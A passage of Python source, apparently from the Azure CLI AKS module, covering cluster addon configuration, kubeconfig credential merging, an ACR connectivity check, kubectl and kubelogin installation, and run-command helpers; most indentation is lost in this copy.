client.begin_create_or_update(resource_group_name, name, instance))
        # For the monitoring addon, the metrics role assignment is not required when MSI auth is used
if enable_monitoring and not enable_msi_auth_for_monitoring:
cloud_name = cmd.cli_ctx.cloud.name
            # MDM metrics are supported only in the Azure public cloud, so add the role assignment only in that cloud
if cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
add_monitoring_role_assignment(
result, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
add_ingress_appgw_addon_role_assignment(result, cmd)
if enable_virtual_node:
            # All agent pools reside in the same VNet, and the VNet-level Contributor role is granted
            # in a later function, so using an arbitrary agent pool here is OK
random_agent_pool = result.agent_pool_profiles[0]
if random_agent_pool.vnet_subnet_id != "":
add_virtual_node_role_assignment(
cmd, result, random_agent_pool.vnet_subnet_id)
            # Otherwise, the cluster is not using a custom VNet; the permission is already granted by the AKS RP,
            # so we don't need to handle it on the client side in this case.
else:
result = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, name, instance)
return result
def _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
subnet_name=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
enable_secret_rotation=False,
disable_secret_rotation=False,
rotation_poll_interval=None,
no_wait=False):
ManagedClusterAddonProfile = cmd.get_models('ManagedClusterAddonProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
if addon_arg not in ADDONS:
raise CLIError("Invalid addon name: {}.".format(addon_arg))
addon = ADDONS[addon_arg]
if addon == CONST_VIRTUAL_NODE_ADDON_NAME:
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# honor addon names defined in Azure CLI
for key in list(addon_profiles):
if key.lower() == addon.lower() and key != addon:
addon_profiles[addon] = addon_profiles.pop(key)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(
addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == CONST_MONITORING_ADDON_NAME:
if addon_profile.enabled:
                    raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
                                   'To change monitoring configuration, run "az aks disable-addons -a monitoring" '
                                   'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profile.config = {
CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id}
addon_profile.config[CONST_MONITORING_USING_AAD_MSI_AUTH] = enable_msi_auth_for_monitoring
elif addon == (CONST_VIRTUAL_NODE_ADDON_NAME + os_type):
if addon_profile.enabled:
                    raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
                                   'To change virtual-node configuration, run '
                                   f'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
                                   'before enabling it again.')
if not subnet_name:
raise CLIError(
'The aci-connector addon requires setting a subnet name.')
addon_profile.config = {
CONST_VIRTUAL_NODE_SUBNET_NAME: subnet_name}
elif addon == CONST_INGRESS_APPGW_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
'To change ingress-appgw configuration, run '
f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
elif addon == CONST_CONFCOM_ADDON_NAME:
if addon_profile.enabled:
raise ValidationError('The confcom addon is already enabled for this managed cluster.',
recommendation='To change confcom configuration, run '
f'"az aks disable-addons -a confcom -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
elif addon == CONST_OPEN_SERVICE_MESH_ADDON_NAME:
if addon_profile.enabled:
raise AzureInternalError(
'The open-service-mesh addon is already enabled for this managed '
'cluster.\n To change open-service-mesh configuration, run '
'"az aks disable-addons -a open-service-mesh -n {} -g {}" '
'before enabling it again.'
.format(name, resource_group_name))
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
elif addon == CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME:
if addon_profile.enabled:
raise ArgumentUsageError(
'The azure-keyvault-secrets-provider addon is already enabled for this managed cluster.\n'
'To change azure-keyvault-secrets-provider configuration, run '
f'"az aks disable-addons -a azure-keyvault-secrets-provider -n {name} -g {resource_group_name}" ' # pylint: disable=line-too-long
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_SECRET_ROTATION_ENABLED: "false", CONST_ROTATION_POLL_INTERVAL: "2m"})
if enable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
if disable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "false"
if rotation_poll_interval is not None:
addon_profile.config[CONST_ROTATION_POLL_INTERVAL] = rotation_poll_interval
addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
if addon == CONST_KUBE_DASHBOARD_ADDON_NAME:
addon_profiles[addon] = ManagedClusterAddonProfile(
enabled=False)
else:
raise CLIError(
"The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP profile because otherwise validation complains
instance.service_principal_profile = None
return instance
def aks_get_credentials(cmd, client, resource_group_name, name, admin=False,
path=os.path.join(os.path.expanduser(
'~'), '.kube', 'config'),
overwrite_existing=False, context_name=None, public_fqdn=False,
credential_format=None):
credentialResults = None
serverType = None
if public_fqdn:
serverType = 'public'
if credential_format:
credential_format = credential_format.lower()
if admin:
raise InvalidArgumentValueError("--format can only be specified when requesting clusterUser credential.")
if admin:
if cmd.cli_ctx.cloud.profile == "latest":
credentialResults = client.list_cluster_admin_credentials(
resource_group_name, name, serverType)
else:
credentialResults = client.list_cluster_admin_credentials(
resource_group_name, name)
else:
if cmd.cli_ctx.cloud.profile == "latest":
credentialResults = client.list_cluster_user_credentials(
resource_group_name, name, serverType, credential_format)
else:
credentialResults = client.list_cluster_user_credentials(
resource_group_name, name)
# Check if KUBECONFIG environmental variable is set
# If path is different than default then that means -f/--file is passed
# in which case we ignore the KUBECONFIG variable
# KUBECONFIG can be colon separated. If we find that condition, use the first entry
if "KUBECONFIG" in os.environ and path == os.path.join(os.path.expanduser('~'), '.kube', 'config'):
path = os.environ["KUBECONFIG"].split(":")[0]
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(
encoding='UTF-8')
_print_or_merge_credentials(
path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
def _handle_merge(existing, addition, key, replace):
if not addition.get(key, False):
return
if key not in existing:
raise FileOperationError(
"No such key '{}' in existing config, please confirm whether it is a valid config file. "
"May back up this config file, delete it and retry the command.".format(
key
)
)
if not existing.get(key):
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if not i.get('name', False) or not j.get('name', False):
continue
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
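# Illustrative sketch (added for clarity; minimal hypothetical kubeconfig fragments):
# with replace=True, an entry in `existing` whose name matches one coming from
# `addition` is overwritten instead of triggering the interactive prompt.
def _example_handle_merge():
    existing = {'clusters': [{'name': 'aks1', 'cluster': {'server': 'https://old'}}]}
    addition = {'clusters': [{'name': 'aks1', 'cluster': {'server': 'https://new'}}]}
    _handle_merge(existing, addition, 'clusters', replace=True)
    return existing['clusters'][0]['cluster']['server'] == 'https://new'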
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
raise
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
    addition = load_kubernetes_configuration(addition_file)
    if addition is None:
        raise CLIError(
            'failed to load additional configuration from {}'.format(addition_file))
    if context_name is not None:
addition['contexts'][0]['name'] = context_name
addition['contexts'][0]['context']['cluster'] = context_name
addition['clusters'][0]['name'] = context_name
addition['current-context'] = context_name
# rename the admin context so it doesn't overwrite the user context
for ctx in addition.get('contexts', []):
try:
if ctx['context']['user'].startswith('clusterAdmin'):
admin_name = ctx['name'] + '-admin'
addition['current-context'] = ctx['name'] = admin_name
break
except (KeyError, TypeError):
continue
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != "Windows" and not os.path.islink(existing_file):
existing_file_perms = "{:o}".format(stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith("600"):
logger.warning(
'%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file,
existing_file_perms,
)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(
current_context, existing_file)
logger.warning(msg)
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(
path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning(
'Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def aks_update_credentials(cmd, client, resource_group_name, name,
reset_service_principal=False,
reset_aad=False,
service_principal=None,
client_secret=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_client_app_id=None,
aad_tenant_id=None,
no_wait=False):
ManagedClusterServicePrincipalProfile = cmd.get_models('ManagedClusterServicePrincipalProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
if bool(reset_service_principal) == bool(reset_aad):
raise CLIError(
'usage error: --reset-service-principal | --reset-aad-profile')
if reset_service_principal:
if service_principal is None or client_secret is None:
raise CLIError(
'usage error: --reset-service-principal --service-principal ID --client-secret SECRET')
service_principal_profile = ManagedClusterServicePrincipalProfile(
client_id=service_principal, secret=client_secret
)
return sdk_no_wait(no_wait,
client.begin_reset_service_principal_profile,
resource_group_name,
name, service_principal_profile)
if not all([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
raise CLIError('usage error: --reset-aad --aad-client-app-id ID --aad-server-app-id ID '
'--aad-server-app-secret SECRET [--aad-tenant-id ID]')
parameters = {
'clientAppID': aad_client_app_id,
'serverAppID': aad_server_app_id,
'serverAppSecret': aad_server_app_secret,
'tenantID': aad_tenant_id
}
return sdk_no_wait(no_wait,
client.begin_reset_aad_profile,
resource_group_name,
name, parameters)
def aks_check_acr(cmd, client, resource_group_name, name, acr, node_name=None):
if not acr.endswith(CONST_ACR_DOMAIN_NAME):
acr = acr + CONST_ACR_DOMAIN_NAME
if not which("kubectl"):
raise ValidationError("Can not find kubectl executable in PATH")
return_msg = None
fd, browse_path = tempfile.mkstemp()
try:
aks_get_credentials(
cmd, client, resource_group_name, name, admin=False, path=browse_path
)
# Get kubectl minor version
kubectl_minor_version = -1
try:
cmd = f"kubectl version -o json --kubeconfig {browse_path}"
output = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
jsonS, _ = output.communicate()
kubectl_version = json.loads(jsonS)
# Remove any non-numeric characters like + from minor version
kubectl_minor_version = int(re.sub(r"\D", "", kubectl_version["clientVersion"]["minor"]))
kubectl_server_minor_version = int(
kubectl_version["serverVersion"]["minor"])
kubectl_server_patch = int(
kubectl_version["serverVersion"]["gitVersion"].split(".")[-1])
if kubectl_server_minor_version < 17 or (kubectl_server_minor_version == 17 and kubectl_server_patch < 14):
logger.warning(
"There is a known issue for Kubernetes versions < 1.17.14 when connecting to "
"ACR using MSI. See https://github.com/kubernetes/kubernetes/pull/96355 for"
"more information."
)
except subprocess.CalledProcessError as err:
raise ValidationError(
"Could not find kubectl minor version: {}".format(err))
if kubectl_minor_version == -1:
raise ValidationError("Failed to get kubectl version")
podName = "canipull-" + str(uuid.uuid4())
overrides = {
"spec": {
"restartPolicy": "Never",
"hostNetwork": True,
"containers": [
{
"securityContext": {"runAsUser": 0},
"name": podName,
"image": CONST_CANIPULL_IMAGE,
"args": ["-v6", acr],
"stdin": True,
"stdinOnce": True,
"volumeMounts": [
{"name": "azurejson", "mountPath": "/etc/kubernetes"},
{"name": "sslcerts", "mountPath": "/etc/ssl/certs"},
],
}
],
"tolerations": [
{"key": "CriticalAddonsOnly", "operator": "Exists"},
{"effect": "NoExecute", "operator": "Exists"},
],
"volumes": [
{"name": "azurejson", "hostPath": {"path": "/etc/kubernetes"}},
{"name": "sslcerts", "hostPath": {"path": "/etc/ssl/certs"}},
],
"nodeSelector": {"kubernetes.io/os": "linux"},
}
}
if node_name is not None:
affinity = {
"nodeAffinity": {
"requiredDuringSchedulingIgnoredDuringExecution": {
"nodeSelectorTerms": [
{
"matchExpressions": [
{"key": "kubernetes.io/hostname", "operator": "In", "values": [node_name]}
]
}
]
}
}
}
overrides["spec"]["affinity"] = affinity
try:
cmd = [
"kubectl",
"run",
"--kubeconfig",
browse_path,
"--rm",
"--quiet",
"--image",
CONST_CANIPULL_IMAGE,
"--overrides",
json.dumps(overrides),
"-it",
podName,
"--namespace=default",
]
            # Support kubectl versions < 1.18
if kubectl_minor_version < 18:
cmd += ["--generator=run-pod/v1"]
output = subprocess.check_output(
cmd,
universal_newlines=True,
stderr=subprocess.STDOUT,
)
except subprocess.CalledProcessError as err:
raise AzureInternalError("Failed to check the ACR: {} Command output: {}".format(err, err.output))
if output:
print(output)
# only return the output in test case "test_aks_create_attach_acr"
test_hook_data = get_cmd_test_hook_data("test_aks_create_attach_acr.hook")
if test_hook_data:
test_configs = test_hook_data.get("configs", None)
if test_configs and test_configs.get("returnOutput", False):
return_msg = output
else:
raise AzureInternalError("Failed to check the ACR.")
finally:
os.close(fd)
return return_msg
# install kubectl & kubelogin
def k8s_install_cli(cmd, client_version='latest', install_location=None, base_src_url=None,
kubelogin_version='latest', kubelogin_install_location=None,
kubelogin_base_src_url=None):
k8s_install_kubectl(cmd, client_version, install_location, base_src_url)
k8s_install_kubelogin(cmd, kubelogin_version,
kubelogin_install_location, kubelogin_base_src_url)
# install kubectl
def k8s_install_kubectl(cmd, client_version='latest', install_location=None, source_url=None):
"""
Install kubectl, a command-line interface for Kubernetes clusters.
"""
if not source_url:
source_url = "https://storage.googleapis.com/kubernetes-release/release"
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurechinacloud':
source_url = 'https://mirror.azure.cn/kubernetes/kubectl'
if client_version == 'latest':
context = _ssl_context()
version = urlopen(source_url + '/stable.txt', context=context).read()
client_version = version.decode('UTF-8').strip()
else:
client_version = "v%s" % client_version
file_url = ''
system = platform.system()
base_url = source_url + '/{}/bin/{}/amd64/{}'
# ensure installation directory exists
install_dir, cli = os.path.dirname(
install_location), os.path.basename(install_location)
if not os.path.exists(install_dir):
os.makedirs(install_dir)
if system == 'Windows':
file_url = base_url.format(client_version, 'windows', 'kubectl.exe')
elif system == 'Linux':
# TODO: Support ARM CPU here
file_url = base_url.format(client_version, 'linux', 'kubectl')
elif system == 'Darwin':
file_url = base_url.format(client_version, 'darwin', 'kubectl')
else:
        raise CLIError(
            'Unsupported operating system: {}.'.format(system))
logger.warning('Downloading client to "%s" from "%s"',
install_location, file_url)
try:
_urlretrieve(file_url, install_location)
os.chmod(install_location,
os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
except IOError as ex:
raise CLIError(
'Connection error while attempting to download client ({})'.format(ex))
    if system == 'Windows':  # be verbose, as the install_location is likely not in Windows' search PATH
env_paths = os.environ['PATH'].split(';')
found = next((x for x in env_paths if x.lower().rstrip(
'\\') == install_dir.lower()), None)
if not found:
# pylint: disable=logging-format-interpolation
logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
'This is good for the current command session.\n'
' 2. Update system PATH environment variable by following '
'"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
'You only need to do it once'.format(install_dir, cli))
else:
logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
install_dir, cli)
# install kubelogin
def k8s_install_kubelogin(cmd, client_version='latest', install_location=None, source_url=None):
"""
Install kubelogin, a client-go credential (exec) plugin implementing azure authentication.
"""
cloud_name = cmd.cli_ctx.cloud.name
if not source_url:
source_url = 'https://github.com/Azure/kubelogin/releases/download'
if cloud_name.lower() == 'azurechinacloud':
source_url = 'https://mirror.azure.cn/kubernetes/kubelogin'
if client_version == 'latest':
context = _ssl_context()
latest_release_url = 'https://api.github.com/repos/Azure/kubelogin/releases/latest'
if cloud_name.lower() == 'azurechinacloud':
latest_release_url = 'https://mirror.azure.cn/kubernetes/kubelogin/latest'
latest_release = urlopen(latest_release_url, context=context).read()
client_version = json.loads(latest_release)['tag_name'].strip()
else:
client_version = "v%s" % client_version
base_url = source_url + '/{}/kubelogin.zip'
file_url = base_url.format(client_version)
# ensure installation directory exists
install_dir, cli = os.path.dirname(
install_location), os.path.basename(install_location)
if not os.path.exists(install_dir):
os.makedirs(install_dir)
system = platform.system()
if system == 'Windows':
sub_dir, binary_name = 'windows_amd64', 'kubelogin.exe'
elif system == 'Linux':
# TODO: Support ARM CPU here
sub_dir, binary_name = 'linux_amd64', 'kubelogin'
elif system == 'Darwin':
if platform.machine() == 'arm64':
sub_dir, binary_name = 'darwin_arm64', 'kubelogin'
else:
sub_dir, binary_name = 'darwin_amd64', 'kubelogin'
else:
        raise CLIError(
            'Unsupported operating system: {}.'.format(system))
with tempfile.TemporaryDirectory() as tmp_dir:
try:
download_path = os.path.join(tmp_dir, 'kubelogin.zip')
logger.warning('Downloading client to "%s" from "%s"',
download_path, file_url)
_urlretrieve(file_url, download_path)
except IOError as ex:
raise CLIError(
'Connection error while attempting to download client ({})'.format(ex))
_unzip(download_path, tmp_dir)
download_path = os.path.join(tmp_dir, 'bin', sub_dir, binary_name)
shutil.move(download_path, install_location)
os.chmod(install_location, os.stat(install_location).st_mode |
stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    if system == 'Windows':  # be verbose, as the install_location is likely not in Windows' search PATH
env_paths = os.environ['PATH'].split(';')
found = next((x for x in env_paths if x.lower().rstrip(
'\\') == install_dir.lower()), None)
if not found:
# pylint: disable=logging-format-interpolation
logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
'This is good for the current command session.\n'
' 2. Update system PATH environment variable by following '
'"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
'You only need to do it once'.format(install_dir, cli))
else:
logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
install_dir, cli)
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
# added in python 2.7.13 and 3.6
return ssl.SSLContext(ssl.PROTOCOL_TLS)
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _urlretrieve(url, filename):
req = urlopen(url, context=_ssl_context())
with open(filename, "wb") as f:
f.write(req.read())
def _unzip(src, dest):
logger.debug('Extracting %s to %s.', src, dest)
system = platform.system()
if system in ('Linux', 'Darwin', 'Windows'):
with zipfile.ZipFile(src, 'r') as zipObj:
zipObj.extractall(dest)
else:
raise CLIError('The current system is not supported.')
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True):
return sdk_no_wait(no_wait, client.begin_rotate_cluster_certificates, resource_group_name, name)
def aks_get_versions(cmd, client, location):
return client.list_orchestrators(location, resource_type='managedClusters')
def aks_runcommand(cmd, client, resource_group_name, name, command_string="", command_files=None, no_wait=False):
colorama.init()
mc = client.get(resource_group_name, name)
if not command_string:
raise ValidationError('Command cannot be empty.')
RunCommandRequest = cmd.get_models('RunCommandRequest', resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
request_payload = RunCommandRequest(command=command_string)
request_payload.context = _get_command_context(command_files)
    # If this cluster has Azure AD enabled, we should pass the user token
    # so that the command also executes under the current user's identity.
    # Here we acquire a token for the AKS managed server AppID (same ID for all clouds).
if mc.aad_profile is not None and mc.aad_profile.managed:
request_payload.cluster_token = _get_dataplane_aad_token(
cmd.cli_ctx, "6dae42f8-4368-4678-94ff-3960e28e3630")
command_result_poller = sdk_no_wait(
no_wait, client.begin_run_command, resource_group_name, name, request_payload, polling_interval=5, retry_total=0
)
if no_wait:
# pylint: disable=protected-access
command_result_polling_url = command_result_poller.polling_method()._initial_response.http_response.headers[
"location"
]
command_id_regex = re.compile(r"commandResults\/(\w*)\?")
command_id = command_id_regex.findall(command_result_polling_url)[0]
_aks_command_result_in_progess_helper(client, resource_group_name, name, command_id)
return
return _print_command_result(cmd.cli_ctx, command_result_poller.result(300))
def aks_command_result(cmd, client, resource_group_name, name, command_id=""):
if not command_id:
raise ValidationError('CommandID cannot be empty.')
commandResult = client.get_command_result(resource_group_name, name, command_id)
if commandResult is None:
_aks_command_result_in_progess_helper(client, resource_group_name, name, command_id)
return
return _print_command_result(cmd.cli_ctx, commandResult)
def _aks_command_result_in_progess_helper(client, resource_group_name, name, command_id):
# pylint: disable=unused-argument
def command_result_direct_response_handler(pipeline_response, *args, **kwargs):
deserialized_data = pipeline_response.context.get("deserialized_data", {})
if deserialized_data:
provisioning_state = deserialized_data.get("properties", {}).get("provisioningState", None)
started_at = deserialized_data.get("properties", {}).get("startedAt", None)
print(f"command id: {command_id}, started at: {started_at}, status: {provisioning_state}")
print(
f"Please use command \"az aks command result -g {resource_group_name} -n {name} -i {command_id}\" "
"to get the future execution result"
)
else:
print(f"failed to fetch command result for command id: {command_id}")
client.get_command_result(resource_group_name, name, command_id, cls=command_result_direct_response_handler)
def _print_command_result(cli_ctx, commandResult):
    # cli_ctx.data['safe_params'] contains the list of parameter names the user typed in, without values.
    # CLI core also uses this to calculate the ParameterSetName header for all HTTP requests from the CLI.
if (cli_ctx.data['safe_params'] is None or
"-o" in cli_ctx.data['safe_params'] or
"--output" in cli_ctx.data['safe_params']):
# user specified output format, honor their choice, return object to render pipeline
return commandResult
    # The user didn't specify any format, so we can customize the output for the best experience.
if commandResult.provisioning_state == "Succeeded":
# succeed, print exitcode, and logs
print(
f"{colorama.Fore.GREEN}command started at {commandResult.started_at}, "
f"finished at {commandResult.finished_at} "
f"with exitcode={commandResult.exit_code}{colorama.Style.RESET_ALL}")
print(commandResult.logs)
return
if commandResult.provisioning_state == "Failed":
# failed, print reason in error
print(
f"{colorama.Fore.RED}command failed with reason: {commandResult.reason}{colorama.Style.RESET_ALL}")
return
# *-ing state
print(f"{colorama.Fore.BLUE}command is in {commandResult.provisioning_state} state{colorama.Style.RESET_ALL}")
return
def _get_command_context(command_files):
if not command_files:
return ""
filesToAttach = {}
    # "." means attach the current folder; it cannot be combined with other files (at least for now).
if len(command_files) == 1 and command_files[0] == ".":
# current folder
cwd = os.getcwd()
for filefolder, _, files in os.walk(cwd):
for file in files:
# retain folder structure
rel = os.path.relpath(filefolder, cwd)
filesToAttach[os.path.join(
filefolder, file)] = os.path.join(rel, file)
else:
for file in command_files:
if file == ".":
raise ValidationError(
". is used to attach current folder, not expecting other attachements.")
if os.path.isfile(file):
# for individual attached file, flatten them to same folder
filesToAttach[file] = os.path.basename(file)
else:
raise ValidationError(
f"{file} is not valid file, or not accessable.")
if len(filesToAttach) < 1:
logger.debug("no files to attach!")
return ""
zipStream = io.BytesIO()
zipFile = zipfile.ZipFile(zipStream, "w")
for _, (osfile, zipEntry) in enumerate(filesToAttach.items()):
zipFile.write(osfile, zipEntry)
# zipFile.printdir() // use this to debug
zipFile.close()
return str(base64.encodebytes(zipStream.getbuffer()), "utf-8")
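# Illustrative sketch, not part of the Azure CLI module: the command context built by
# _get_command_context above is simply a base64-encoded zip archive. The hypothetical
# helper below (its name and usage are assumptions) shows how such a payload could be
# inspected locally; it is defined but never called by the CLI code.
def _example_decode_command_context(encoded_context):
    """Return the file names contained in a base64-encoded command context."""
    import base64
    import io
    import zipfile
    if not encoded_context:
        return []
    raw = base64.b64decode(encoded_context)
    with zipfile.ZipFile(io.BytesIO(raw)) as zip_file:
        return zip_file.namelist()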
def _get_dataplane_aad_token(cli_ctx, serverAppId):
# this function is mostly copied from keyvault cli
return Profile(cli_ctx=cli_ctx).get_raw_token(resource=serverAppId)[0][2].get('accessToken')
# legacy: dev space command
DEV_SPACES_EXTENSION_NAME = 'dev-spaces'
DEV_SPACES_EXTENSION_MODULE = 'azext_dev_spaces.custom'
# legacy: dev space command
def aks_use_dev_spaces(cmd, client, name, resource_group_name, update=False, space_name=None,
endpoint_type='Public', prompt=False):
"""
Use Azure Dev Spaces with a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
:param resource_group_name: Name of resource group. You can configure the default group. \
Using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param update: Update to the latest Azure Dev Spaces client components.
:type update: bool
:param space_name: Name of the new or existing dev space to select. Defaults to an \
interactive selection experience.
:type space_name: String
:param endpoint_type: The endpoint type to be used for a Azure Dev Spaces controller. \
See https://aka.ms/azds-networking for more information.
:type endpoint_type: String
:param prompt: Do not prompt for confirmation. Requires --space.
:type prompt: bool
"""
if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE, update):
azext_custom = _get_azext_module(
DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_use_dev_spaces(
name, resource_group_name, update, space_name, endpoint_type, prompt)
except TypeError:
raise CLIError(
"Use '--update' option to get the latest Azure Dev Spaces client components.")
except AttributeError as ae:
raise CLIError(ae)
# legacy: dev space command
def aks_remove_dev_spaces(cmd, client, name, resource_group_name, prompt=False):
"""
Remove Azure Dev Spaces from a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
:param resource_group_name: Name of resource group. You can configure the default group. \
Using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param prompt: Do not prompt for confirmation.
:type prompt: bool
"""
if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE):
azext_custom = _get_azext_module(
DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_remove_dev_spaces(
name, resource_group_name, prompt)
except AttributeError as ae:
raise CLIError(ae)
# legacy: dev space command
def _get_azext_module(extension_name, module_name):
try:
# Adding the installed extension in the path
from azure.cli.core.extension.operations import add_extension_to_path
add_extension_to_path(extension_name)
# Import the extension module
from importlib import import_module
azext_custom = import_module(module_name)
return azext_custom
except ImportError as ie:
raise CLIError(ie)
# legacy: dev space command
def _install_dev_spaces_extension(cmd, extension_name):
try:
from azure.cli.core.extension import operations
operations.add_extension(cmd=cmd, extension_name=extension_name)
    except Exception:  # noqa pylint: disable=broad-except
return False
return True
# legacy: dev space command
